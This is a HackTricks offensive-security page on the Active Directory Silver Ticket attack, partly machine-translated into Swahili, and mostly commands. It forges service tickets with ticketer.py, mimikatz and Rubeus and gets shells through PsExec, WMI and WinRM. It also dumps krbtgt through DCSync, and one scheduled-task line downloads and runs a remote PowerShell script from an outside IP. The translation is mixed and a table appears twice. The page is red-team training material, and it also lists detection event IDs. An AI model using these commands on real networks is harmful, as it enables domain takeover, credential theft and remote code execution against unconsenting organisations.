Silver Ticket

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!

Silver ticket

Shambulio la Silver Ticket linahusisha unyakuzi wa tiketi za huduma katika mazingira ya Active Directory (AD). Njia hii inategemea kupata hash ya NTLM ya akaunti ya huduma, kama akaunti ya kompyuta, ili kutunga tiketi ya Ticket Granting Service (TGS). Kwa tiketi hii iliyotungwa, mshambuliaji anaweza kufikia huduma maalum kwenye mtandao, akijifanya kuwa mtumiaji yeyote, kwa kawaida akilenga haki za usimamizi. Inasisitizwa kwamba kutumia funguo za AES kwa kutunga tiketi ni salama zaidi na ngumu kugundulika.

Kwa ajili ya kutunga tiketi, zana tofauti zinatumika kulingana na mfumo wa uendeshaji:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Kwenye Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.

Available Services

Service Type	Service Silver Tickets
WMI	HOST RPCSS
PowerShell Remoting	HOST HTTP Kulingana na OS pia: WSMAN RPCSS
WinRM	HOST HTTP Katika matukio mengine unaweza tu kuuliza: WINRM
Scheduled Tasks	HOST
Windows File Share, also psexec	CIFS
LDAP operations, included DCSync	LDAP
Windows Remote Server Administration Tools	RPCSS LDAP CIFS
Golden Tickets	krbtgt

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Kulingana na OS pia:

WSMAN

RPCSS

WinRM

HOST

HTTP

Katika matukio mengine unaweza tu kuuliza: WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Using Rubeus you may ask for all these tickets using the parameter:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silver tickets Event IDs

4624: Account Logon
4634: Account Logoff
4672: Admin Logon

Abusing Service tickets

In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.

CIFS

With this ticket you will be able to access the C$ and ADMIN$ folder via SMB (if they are exposed) and copy files to a part of the remote filesystem just doing something like:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec:

PsExec/Winexec/ScExec

HOST

With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

Kwa tiketi hizi unaweza kutekeleza WMI katika mfumo wa mwathirika:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Pata maelezo zaidi kuhusu wmiexec katika ukurasa ufuatao:

WmiExec

HOST + WSMAN (WINRM)

Kwa ufikiaji wa winrm juu ya kompyuta unaweza kuipata na hata kupata PowerShell:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Check the following page to learn njia zaidi za kuungana na mwenyeji wa mbali kwa kutumia winrm:

WinRM

Note that winrm lazima iwe hai na inasikiliza kwenye kompyuta ya mbali ili kuweza kuipata.

LDAP

With this privilege you can dump the DC database using DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Jifunze zaidi kuhusu DCSync katika ukurasa ufuatao:

Marejeo

DCSync

Usanidi wa bug bounty: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi katika https://go.intigriti.com/hacktricks leo, na anza kupata zawadi hadi $100,000!

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousSID-History Injection NextSkeleton Key

Last updated 4 months ago